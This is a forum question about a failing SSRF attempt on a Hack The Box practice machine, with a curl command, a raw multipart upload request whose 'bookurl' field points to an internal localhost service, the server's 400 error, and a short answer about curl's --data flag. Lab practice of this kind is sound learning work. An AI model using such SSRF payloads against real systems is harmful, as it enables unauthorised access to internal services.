I`m trying to perform a SSRF attack on a Hack The Box machine (editorial.htb). I'm trying to send a POST request using curl with the command
curl --data "hckyou.txt" -X POST http://editorial.htb/upload
The POST request in "hckyou.txt" is the following"
POST /upload HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246068047919283104132964618623
Content-Length: 691
Origin: http://editorial.htb
Connection: keep-alive
Referer: http://editorial.htb/upload
-----------------------------246068047919283104132964618623
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:5000
-----------------------------246068047919283104132964618623
Content-Disposition: form-data; name="bookfile; filename =""
Content-Type: application/octet-stream
111
-----------------------------149682616639422075182982487158
Content-Disposition: form-data; name="bookintro"
-----------------------------149682616639422075182982487158
Content-Disposition: form-data; name="whyus"
aa@aa
-----------------------------149682616639422075182982487158
Content-Disposition: form-data; name="email"
111111
-----------------------------149682616639422075182982487158
Content-Disposition: form-data; name="phone"
But the host answer to the request is the following:
<!doctype html>
<html lang=en>
<title>400 Bad Request</title>
<h1>Bad Request</h1>
<p>The browser (or proxy) sent a request that this server could not understand.</p>
Has anybody any idea about what's wrong on my request? This is driving me crazy...
--dataargument of curl is expected to be the request body only, not the full request including request header like you did.